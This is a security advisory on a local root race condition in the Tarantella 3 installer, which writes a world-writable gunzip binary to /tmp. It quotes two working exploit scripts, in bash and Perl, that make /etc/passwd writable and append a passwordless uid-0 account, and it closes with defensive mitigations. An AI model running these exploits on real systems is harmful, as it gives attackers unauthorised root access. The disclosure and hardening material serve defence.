COMMAND

    Tarantella local root compromise at installation time via bad tmp practice

SYSTEMS AFFECTED

    Tarantella 3

PROBLEM

    "Larry W. Cashdollar" in "Vapid Labs" [http://vapid.dhs.org/] advisory says :

    The installation script provided with Tarantella handles utility packages
    during installation insecurely. A root owned binary "gunzip" is created in
    /tmp with world writeable permissions, the pid is appended to the filename.

        TMP_GUNZIP=$TMPDIR/gunzip$$

        $ ls -l /tmp/gunzip16152
        -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152

    gunzip is extracted:

        extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
        extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

    The permissions of gunzip are changed to rwx for all:

        chmod 777 $TMP_GUNZIP >/dev/null 2>&1

    The binary is used during installation:

        extract $efilename | $TMP_GUNZIP -q > "$efilename"

    Exploit
    =======

    There is a race condition between when gunzip is extracted and used during
    installation, during which a malicious local user could inject code to
    compromise the system quickly.

        $ echo "#!/bin/sh" > /tmp/test.sh
        $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
        $ cat /tmp/test.sh > /tmp/gunzip16152

    I was able to change the permissions of /etc/passwd to 777 by performing the
    above as an unprivileged user.

    In a script :

        #!/bin/bash
        #Larry W. Cashdollar lwc@vapid.dhs.org
        #http://vapid.dhs.org
        #Tarantella Enterprise 3 symlink local root Installation exploit
        #For educational purposes only.
        #tested on Linux. run and wait.

        echo "Creating symlink."
        /bin/ln -s /etc/passwd /tmp/spinning
        echo "Waiting for tarantella installation."

        while true
        do
            echo -n .
            if [ -w /etc/passwd ]
            then
                echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
                su - tarexp
                exit
            fi
        done

    -Also-

        #!/usr/bin/perl -w
        #Another Exploit for tarantella enterprise 3 installation.
        #Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
        #Exploits gunzip$$ binary being created in /tmp with perm 777
        #http://online.securityfocus.com/bid/3966
        #Experimental ext3 kernel mods for preventing/researching race conditions.
        #http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

        use strict;

        `cat << -EOF- > root.sh
        #!/bin/sh
        chmod 777 /etc/passwd
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        -EOF-`;

        my $OUT = '';

        while(!$OUT) {
            $OUT = `ps -ax |grep gunzip |grep -v grep`;
            print "Found $OUT\n";
        }

        my @args = split(' ',$OUT);

        # Do this with one copy operation. This will break installation of tarantella.
        # should test for -w on /etc/passwd stop and su - tarexp.
        while(1) {
            `cp root.sh $args[4]`;
        }

SOLUTION

    Perhaps create a directory in /tmp or /var/tmp and use that directory as a
    work place?

        umask 077
        mkdir /tmp/workdir

    Update (05 April 2002)
    ======

    Tarantella addressed these issues in a security bulletin:

        http://www.tarantella.com/security/bulletin-04.html
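    As an added illustration of the private-work-directory fix suggested above (example code, not the advisory's or Tarantella's own), the following POSIX shell replaces the "gunzip$$ in /tmp, chmod 777" pattern with an unpredictable mktemp directory, owner-only permissions, and the file check the installer lacked; extract_helper is a constructed stand-in for the installer's extract routine.

```sh
#!/bin/sh
# Hardened replacement for the installer pattern quoted above
# (TMP_GUNZIP=$TMPDIR/gunzip$$ ... chmod 777). Not Tarantella's code.
# extract_helper is a constructed stand-in for the installer's "extract" routine.

# Create a private work directory with an unpredictable name. mktemp -d makes
# it mode 0700 and fails rather than reusing a path that already exists, so a
# file or symlink planted in advance at a guessable name cannot be hijacked.
make_workdir() {
    ( umask 077; mktemp -d "${TMPDIR:-/tmp}/install.XXXXXX" )
}

# Stand-in for "extract gunzip": emits a small constructed script.
extract_helper() {
    printf '#!/bin/sh\nexec cat "$@"\n'
}

# Permission string of a path, e.g. "-rwx------" (portable, from ls -ld).
perm_of() {
    ls -ld "$1" | cut -c1-10
}

# Refuse to run a helper unless it is a regular file, not a symlink, and
# readable/writable/executable by its owner only. This is the check the
# installer never performed before invoking $TMP_GUNZIP.
is_safe_helper() {
    [ -f "$1" ] && [ ! -L "$1" ] && [ "$(perm_of "$1")" = "-rwx------" ]
}

# Write the helper inside the private directory, owner-only, then verify it.
# chmod 700 rather than 777: only the installing user needs to run it.
install_helper() {
    helper="$1/gunzip"
    ( umask 077; extract_helper > "$helper" ) || return 1
    chmod 700 "$helper" || return 1
    is_safe_helper "$helper" || return 1
    printf '%s\n' "$helper"
}
```

Running the installer's later steps through "$helper" only after is_safe_helper succeeds closes the window in which a world-writable copy could be replaced.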